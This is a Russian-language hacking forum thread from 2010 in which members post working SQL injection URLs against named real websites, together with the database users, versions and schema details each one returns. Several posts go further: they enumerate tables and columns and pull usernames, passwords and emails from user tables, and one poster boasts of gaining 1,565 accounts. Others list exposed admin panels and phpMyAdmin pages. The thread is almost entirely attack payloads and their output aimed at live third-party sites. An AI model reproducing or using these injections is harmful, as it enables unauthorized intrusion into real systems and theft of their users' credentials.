HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.02.2010, 01:12
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Код:
http://avtoarenda.com.ua/ind.php?option=com_tourist&mid=54&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7+--+
avtoarenda_site@localhost:5.1.41:avtoarenda_site

Код:
http://www.obtainsearch.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,group_concat(database(),0x3a,user(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&tr=1
doskapost:doskapost@68.178.254.145:5.0.67.d7-ourdelta-log

Код:
http://www.avtostolica.com.ua/ind.php?id=-1+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9+--+
news@localhost:news:5.0.51a-24+lenny2-log

Код:
http://www.siac.com.sg/details.php?id=56+union+select+1,concat(unhex(hex(user())),0x3a,unhex(hex(database())),0x3a,unhex(hex(version()))),3,4,5,6,7,8,9+--+
root@localhost:siacdb:4.1.10-standard-log

Последний раз редактировалось Seravin; 21.02.2010 в 01:20..
 
Ответить с цитированием

  #2  
Старый 21.02.2010, 01:42
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Код:
http://www.webnewshub.com/story1.php?nid=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(version(),14))+as+t+JOIN+(SELECT+NAME_CONST(version(),14))b)c)
version: 5.0.83-log
 
Ответить с цитированием

  #3  
Старый 21.02.2010, 01:56
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
http://www.makovetskiy.ru/news.php?id=1204+or+(1,2)+in+(select+*+from(Select %20name_const(version(),1),name_const(version(),1) )eba)/*;-)
Duplicate column name '5.0.22'
 
Ответить с цитированием

  #4  
Старый 21.02.2010, 02:28
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Перехакал))

1565 аккаунтов!)))

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(version(),0x3a,user(),0x3a,database()),3+--+&rcid=2
version: 5.0.83-log
user: webnewsadmin@boscgi1303.eigbox.net
database: webnewshub

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(schema_name),3+from+information_schema.schemata+--+&rcid=2
databases: information_schema,webnewshub

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=0x7765626e657773687562+--+&rcid=2
tables:
adv_detail
adv_master
c_category
c_subcat_master
c_subcategory
category
country
gallery
gallery_category
gallery_images
game
news_comments
news_ip_votes
news_master
news_tags
newsletter
poll_ips
poll_master
poll_options
ref_category
ref_master
rss_category
rss_feed,state
tags
user_info

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x757365725f696e666f+--+&rcid=2
user_info columns:
user_id
display_name
user_name
u_email
password
user_type
country
phone_no
reg_date
email_flag
status

Код:
http://www.webnewshub.com/index.php?rid=-1+union+select+1,group_concat(user_name,0x3a,password,0x3a,u_email),3+from+user_info+where+user_name=0x53616e6479+--+&rcid=2

Последний раз редактировалось jokester; 21.02.2010 в 02:45.. Причина: почитай наконец 1 пост, и научись пользоваться кноакой edit =\
 
Ответить с цитированием

  #5  
Старый 21.02.2010, 04:03
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Код:
http://www.eco2000.com.br/capa/ind.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,database(),0x3a,version()),10,11,12+--+
eco2000@localhost:eco2000_noticias:5.0.89-community-log

Прикольное название)
Код:
http://www.computer-and-bees.com/board/ind.php?pn=53&id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
pavl2004_pavl@localhostavl2004_links:5.0.37

Код:
http://sillacinema.com/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1
sillacin_test@localhost:sillacin_test:5.0.89-community

user:id,email,login,pass,name,surname,state,city,r eport
login:id,user,pass,sess,rights,rname,mail,editor
 
Ответить с цитированием

  #6  
Старый 21.02.2010, 05:45
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
С нами: 8706185

Репутация: 27
Cool

PR: 7
[+] User: root@localhost
[-] Version: 4.1.22-community-nt
Database: newenfocus

Код:
http://www.enfocus.com/flows.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13--
[+] admin panel:
Код:
http://www.enfocus.com/admin/
[+] phpMyAdmin:
Код:
http://www.enfocus.com/phpMyAdmin/

---===---

PR: 6
[+] Version: 5.0.89-community
User: sciences_cms@localhost
Database: sciences_cms

Код:
http://www.sciencescotland.org/feature.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8--
---===---

PR: 5
[+] Version: 5.0.45
User: transcoalition@localhost
Database: transcoalition

Код:
http://transitioncoalition.org/transition/assessment_review/view.php?id=7+and+1=0+union+select+1,2,concat_ws(0x3a,username,password),4,5+from+auth_user--

Последний раз редактировалось jokester; 21.02.2010 в 11:32.. Причина: поскромнее надо быть
 
Ответить с цитированием

  #7  
Старый 21.02.2010, 18:15
MenZon
Banned
Регистрация: 14.02.2010
Сообщений: 26
С нами: 8546081

Репутация: 11
По умолчанию

bes.sao.mos.ru

Код:
http://bes.sao.mos.ru/news_full.php?id=28333+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User(),0x3a,@@version_compile_os),0x71),0x71),3,4,5+LIMIT+1,1--
Database Version: 4.1.12
Database name: sao
User name: sao@chicken
OS: redhat-linux-gnu
 
Ответить с цитированием

  #8  
Старый 21.02.2010, 20:06
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

стыдно конечно но не докрутил скулю (даже не узнал version)
если кто-нибудь докрутит скиньте мне вличку please как.

http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,42--+
 
Ответить с цитированием

  #9  
Старый 21.02.2010, 20:50
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=130 78+union+select+1,2,3,4,@@version,6,7,8,9--+
джокестера заслуга бес скобок крутить то можно ...
http://fitnesslife.com.ua/myadmin/index.php

Цитата:
http://www.infovis.net/printMag.php?num=-141+union+select+1,2,3,4,group_concat(User,0x3a,Pa ssword),6,7,8,9,10,11,12,13+FROM+mysql.user--+&lang=2
привилегий на читалку для текущого пользователя нет, ищем пхпмайдмин

Цитата:
http://www.qigong.ru/beginners/index.php?num=-3+union+select+1,concat(version(),0x3a,user(),0x3a ,database(),0x3a,@@version_compile_os),concat(conc at_ws(0x3a,User,Password,file_priv)),4+from+mysql. user+limit+1,1--+&lng=r
юзаем читалку, смотрим пхпинфо
Цитата:
http://www.qigong.ru/test1.php

Последний раз редактировалось Strilo4ka; 22.02.2010 в 04:22..
 
Ответить с цитированием

  #10  
Старый 23.02.2010, 16:59
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Всё в открытом виде, но походу он дохлый уже давно

Код:
http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16--
5.0.89-community:dsthosti_coin1:dsthosti_admin@localhost

tables
Код:
phpcoin_admins,phpcoin_articles,phpcoin_banned,phpcoin_categories,phpcoin_clients,phpcoin_clients_contacts,phpcoin_components,phpcoin_domains,phpcoin_faq,phpcoin_faq_qa,phpcoin_helpdesk,phpcoin_helpdesk_msgs,phpcoin_icons,phpcoin_invoices,phpcoin_invoices_items,phpcoin_invoices_trans,phpcoin_mail_archive,phpcoin_mail_contacts,phpcoin_mail_queue,phpcoin_mail_templates,phpcoin_menu_blocks,phpcoin_menu_blocks_items,phpcoin_orders,phpcoin_orders_sessions,phpcoin_pages,phpcoin_parameters,phpcoin_products,phpcoin_reminders,phpcoin_server_info,phpcoin_sessions,phpcoin_site_info,phpcoin_topics,phpcoin_vendors,phpcoin_vendors_prods,phpcoin_versions,phpcoin_whois
phpcoin_domains columns
Код:
dom_id,dom_cl_id,dom_domain,dom_status,dom_type,dom_registrar,dom_ts_expiration,dom_sa_expiration,dom_si_id,dom_ip,dom_pathdom_path_temp,dom_url_cp,dom_user_name_cp,dom_user_pword_cp,dom_user_name_ftp,dom_user_pword_ftp,dom_allow_domains,dom_allow_subdomains,dom_allow_disk_space_mb,dom_allow_traffic_mb,dom_allow_mailboxes,dom_allow_databases,dom_enable_www_prefix,dom_enable_wu_scripting,dom_enable_webmail,dom_enable_frontpage,dom_enable_fromtpage_ssl,dom_enable_ssi,dom_enable_php,dom_enable_cgi,dom_enable_mod_perl,dom_enable_asp,dom_enable_ssl,dom_enable_stats,dom_enable_err_docs,dom_notes
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...